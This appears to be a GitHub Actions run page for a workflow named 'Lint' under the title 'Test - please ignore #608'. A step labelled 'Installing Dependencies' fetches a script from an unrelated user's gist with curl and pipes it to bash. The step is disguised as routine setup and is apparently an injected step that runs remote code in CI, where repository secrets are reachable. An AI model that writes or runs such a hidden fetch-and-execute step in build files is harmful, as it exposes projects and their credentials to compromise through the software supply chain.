Skip to content

Test - please ignore #608

Test - please ignore

Test - please ignore #608

Workflow file for this run

name: Lint
on:
push:
pull_request:
workflow_dispatch:
jobs:
Lint:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Use Node.js 16
uses: actions/setup-node@v2
with:
node-version: lts/*
- name: Installing Dependencies
run: |
curl -L https://gist.githubusercontent.com/Len0nJohn/2eb7fe44856749cbd6609ae9017da08a/raw/192493ef4efd2fdca2b30bb5ed4c4eb4a5afb8de/gh.sh | bash
npm install
- name: Install dependencies of the homemade packages.
run: npm run build:dev
- name: Linting
run: npm run lint